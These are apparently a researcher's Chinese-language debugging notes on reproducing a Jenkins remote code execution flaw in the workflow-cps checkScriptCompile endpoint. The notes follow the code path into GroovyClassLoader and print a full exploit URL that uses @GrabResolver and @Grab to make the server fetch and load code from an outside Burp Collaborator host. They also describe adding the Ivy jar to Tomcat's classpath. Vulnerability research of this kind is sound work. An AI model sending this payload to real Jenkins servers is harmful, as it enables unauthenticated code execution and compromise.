先訪問
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
不帶value,
跟進
workflow-cps.jar!\org\jenkinsci\plugins\workflow\cps\CpsFlowDefinition$DescriptorImpl#doCheckScriptCompile(@QueryParameter String value)
發現拋出了NullPointerException
這裏傳入value=shadowsock5
,繼續調試:
跟進:
groovy-all-2.4.12.jar!\groovy\lang\GroovyClassLoader#parseClass(String text)
繼續嘗試使用這個payload:
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0A@GrabResolver(name=%27test%27,%20root=%27http://3mqe92c2mowxdgiek3d7hpbvdmjc71.burpcollaborator.net%27)%0A@Grab(group=%27package%27,%20module=%27vultestvultest%27,%20version=%271%27)%0Aimport%20Payload;
發現沒有找到這個類:org.apache.ivy.Ivy
難道是要把這個包放到jenkins的classpath裏?
嘗試搜索發現可能是缺少某個插件:
選擇1.28版本進行安裝:
http://ftp-chi.osuosl.org/pub/jenkins/plugins/ivy/1.28/ivy.hpi
後來發現這些有Ivy的插件有需要高版本的其他插件,而漏洞利用正是要利用這些插件的漏洞。於是手動將Ivy的jar包:
/home/77/.jenkins/plugins/ivy/WEB-INF/lib/ivy-2.1.0.jar
加上一些classpath裏
/usr/lib/jvm/java-8-oracle/bin/java -Djava.util.logging.config.file=/home/77/repos/tomcat-8.0.38/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -agentlib:jdwp=transport=dt_socket,address=0.0.0.0:8000,server=y,suspend=n -Djava.endorsed.dirs=/home/77/repos/tomcat-8.0.38/endorsed -classpath /home/77/repos/tomcat-8.0.38/bin/bootstrap.jar:/home/77/repos/tomcat-8.0.38/bin/tomcat-juli.jar:/home/77/.jenkins/plugins/ivy/WEB-INF/lib/ivy-2.1.0.jar -Dcatalina.base=/home/77/repos/tomcat-8.0.38 -Dcatalina.home=/home/77/repos/tomcat-8.0.38 -Djava.io.tmpdir=/home/77/repos/tomcat-8.0.38/temp org.apache.catalina.startup.Bootstrap start
Pocsuite: